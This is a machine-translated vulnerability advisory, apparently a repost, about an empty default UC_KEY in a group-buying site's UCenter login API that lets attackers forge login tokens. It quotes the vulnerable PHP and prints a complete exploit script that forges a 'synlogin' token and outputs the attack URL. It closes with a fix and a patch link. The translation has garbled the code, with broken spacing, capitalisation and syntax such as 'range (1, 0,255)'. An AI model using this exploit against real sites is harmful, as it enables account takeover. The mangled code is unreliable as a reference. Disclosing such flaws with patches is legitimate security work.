The ucenter one-stop logon api is integrated with group buying every day. However, uninitialized UC_key will allow attackers to log on to any account or even operate on credit card information.
Detailed description:
$ Get = $ post = array ();
$ Code = @ $ _ GET ['code']; // GET token
Parse_str (_ authcode ($ code, 'decode', UC_KEY), $ get); // The UC_KEY is empty without initialization.
If (MAGIC_QUOTES_GPC ){
$ Get = _ stripslashes ($ get); //?
}
$ Timestamp = time ();
If (empty ($ get )){
Exit ('invalidrequest ');
} Elseif ($ timestamp-$ get ['time']> 3600) {// logon not allowed if the timestamp in the token is valid for less than one hour
Exit ('authracation has expiried ');
}
$ Action = $ get ['action'];
......
If (in_array ($ get ['action'], array ('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout ', 'updatepw', 'updatebadword', 'updatehosts', 'updateapps ', 'updateclient', 'updatecredit', 'getcredentials', 'getcredentials', 'updatecreditsettings '))) {// defines several operation interfaces. Among them, well, there are many interesting things.
......
Function synlogin ($ get, $ post) {// logon Interface
$ Uid = (int) $ get ['uid']; // two parameters are required: uid and username.
$ Username = $ get ['username'];
......
$ Query = $ this-> db-> query ("SELECT uid, password, secques FROM {$ this-> tablepre} system_members WHERE ucuid = '$ uid '"); // What is passed here is not the uid in the database, but the ucuid. Here, it is initially 0, but it is very rough and the username does not enter the Query Process, that is to say, you can only log on to the first account.
$ UserFields = $ this-> db-> fetch_array ($ query );
If (! $ UserFields ){
;
}
If ($ UserFields ){
$ Auth = TTTuangouAuthcode ("{$ UserFields ['Password']} \ t {$ UserFields ['secques']} \ t {$ UserFields ['uid']}"); // retrieve user information and log on directly to the site
_ Setcookie ('sid ', '',-86400*365 );
_ Setcookie ('auth ', $ auth, (365*86400 ));
_ Setcookie ('cookietime', '20140901', (2592000*365 ));
......
UC_KEY is not initialized as null, so it is equivalent that someone else knows your UC_KEY and can perform operations directly, as it is ridiculous to initialize some applications as 123456, after you get your source code, don't you know it again?
Proof of vulnerability:
Exp:
<? Php
Error_reporting (0 );
$ Username = $ argv [1];
$ Key = '';
$ Code = 'time = 1356796800 & username = '. $ username.' & uid = 0 & action = synlogin ';
Echo "$ code \ n ";
$ Exp = urlencode (authcode ($ code, "ENCODE", $ key ));
Print_r ('/api/uc. php? Code = '. $ exp );
Function authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0 ){
$ Ckey_length = 4; www.2cto.com
$ Key = md5 ($ key? $ Key: UC_KEY );
$ Keya = md5 (substr ($ key, 0, 16 ));
$ Keyb = md5 (substr ($ key, 16, 16 ));
$ Keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length )):'';
$ Cryptkey = $ keya. md5 ($ keya. $ keyc );
$ Key_length = strlen ($ cryptkey );
$ String = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0). substr (md5 ($ string. $ keyb), 0, 16). $ string;
$ String_length = strlen ($ string );
$ Result = '';
$ Box = range (1, 0,255 );
$ Rndkey = array ();
For ($ I = 0; $ I <= 255; $ I ++ ){
$ Rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);
}
For ($ j = $ I = 0; I I <256; $ I ++ ){
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
For ($ a = $ j = $ I = 0; $ I <$ string_length; $ I ++ ){
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = 'decode '){
If (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10)-time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16 )){
Return substr ($ result, 26 );
} Else {
Return '';
}
} Else {
Return $ keyc. str_replace ('=', '', base64_encode ($ result ));
}
}
Solution:
You must provide correct guidance during the installation process, such as setting your own key or disabling the uc_client function.
Author milk Tank
Upgrade patches provided by developers: The ucenter module configuration Initialization Vulnerability makes it safer for users to integrate ucenter and download patch updates.
For more information about patches, see http://cenwor.com/thread-12826-1-1.html.